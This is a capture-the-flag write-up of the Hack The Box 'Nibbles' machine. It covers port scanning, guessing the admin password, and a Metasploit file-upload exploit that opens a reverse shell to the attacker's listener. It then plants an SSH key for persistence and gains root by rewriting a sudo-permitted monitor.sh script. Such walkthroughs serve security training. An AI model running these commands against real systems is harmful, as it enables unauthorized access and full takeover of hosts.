Nibbles

tags: HTB Easy Linux OSCP

Enumeration

Nmap

To get started, we run a quick open ports scan.

# nmap -p- -T4 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-14 18:37 CET
Nmap scan report for 10.10.10.75
Host is up (0.094s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 37.53 seconds

Now that we know the open ports, let's scan them in depth.

# nmap -A -Pn -p 22,80 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-14 18:38 CET
Nmap scan report for 10.10.10.75
Host is up (0.094s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.18 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.4 (95%), Linux 4.2 (95%), Linux 4.8 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 22/tcp)
HOP RTT      ADDRESS
1   93.73 ms 10.10.14.1
2   93.67 ms 10.10.10.75

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.32 seconds

As we can see, there are a web server in the port 80 and a SSH server in the default port 22.

Let's explore the website.
Accesing to the website, we only can read Hello world! but, looking inside the source code, we can find a nibbleblog directory.

<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->

Nibbleblog

In this URL we can find that there is a blog installed with Nibbleblog as we can read in Powered by Nibbleblog

Using searchsploit we can find two available exploits.

# searchsploit nibbleblog
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                                                              |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Nibbleblog 3 - Multiple SQL Injections                                                                                                                                                                      | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)                                                                                                                                                       | php/remote/38489.rb
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results

The File Upload vulnerability needs an account. After much searching around the server without success, I have tried various passwords for the admin user and managed to log in with the box namenibbles as the password. I did not like this point ... it is not realistic at all.

Exploitation

It's time to use the File Upload vulnerability with Metasploit.

msf6 exploit(multi/http/nibbleblog_file_upload) > set USERNAME admin
USERNAME => admin
msf6 exploit(multi/http/nibbleblog_file_upload) > set PASSWORD nibbles
PASSWORD => nibbles
msf6 exploit(multi/http/nibbleblog_file_upload) > set RHOSTS 10.10.10.75
RHOSTS => 10.10.10.75
msf6 exploit(multi/http/nibbleblog_file_upload) > set TARGETURI /nibbleblog/
TARGETURI => /nibbleblog/
msf6 exploit(multi/http/nibbleblog_file_upload) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf6 exploit(multi/http/nibbleblog_file_upload) > run

[*] Started reverse TCP handler on 10.10.14.9:4444
[*] Sending stage (39282 bytes) to 10.10.10.75
[*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.10.10.75:53234) at 2021-03-14 20:54:10 +0100
[+] Deleted image.php

meterpreter > shell
Process 1649 created.
Channel 0 created.
id
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
python3 -c "import pty; pty.spawn('/bin/bash')"
[email protected]:/var/www/html/nibbleblog/content/private/plugins/my_image$

And now, in the nibbler home, we can get the user.txt flag.

[email protected]:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
CENSORED_FLAG

Post exploitation

Let's upgrade to SSH injecting our SSH key.

[email protected]:/home/nibbler$ mkdir .ssh
[email protected]:/home/nibbler$ cd .ssh/
[email protected]:/home/nibbler/.ssh$ echo "KZwNCA7nI0th*****************5E1wl2EByci0=" > authorized_keys
[email protected]:/home/nibbler/.ssh$

Enumeration

Sudo

[email protected]:/var/www/html/nibbleblog/content/private/plugins/my_image$ sudo -l
sudo: unable to resolve host Nibbles: Connection timed out
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

It seems we can run the monitor.sh script as root without password.

Privilege escalation

[email protected]:~$ mkdir -p personal/stuff
[email protected]:~$ cd personal/stuff/
[email protected]:~/personal/stuff$ echo "/bin/bash -i" > monitor.sh
[email protected]:~/personal/stuff$ chmod +x monitor.sh
[email protected]:~/personal/stuff$ sudo /home/nibbler/personal/stuff/monitor.sh
sudo: unable to resolve host Nibbles: Connection timed out
[email protected]:~/personal/stuff# id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:~/personal/stuff# cat /root/root.txt
CENSORED_FLAG

And that's all folks!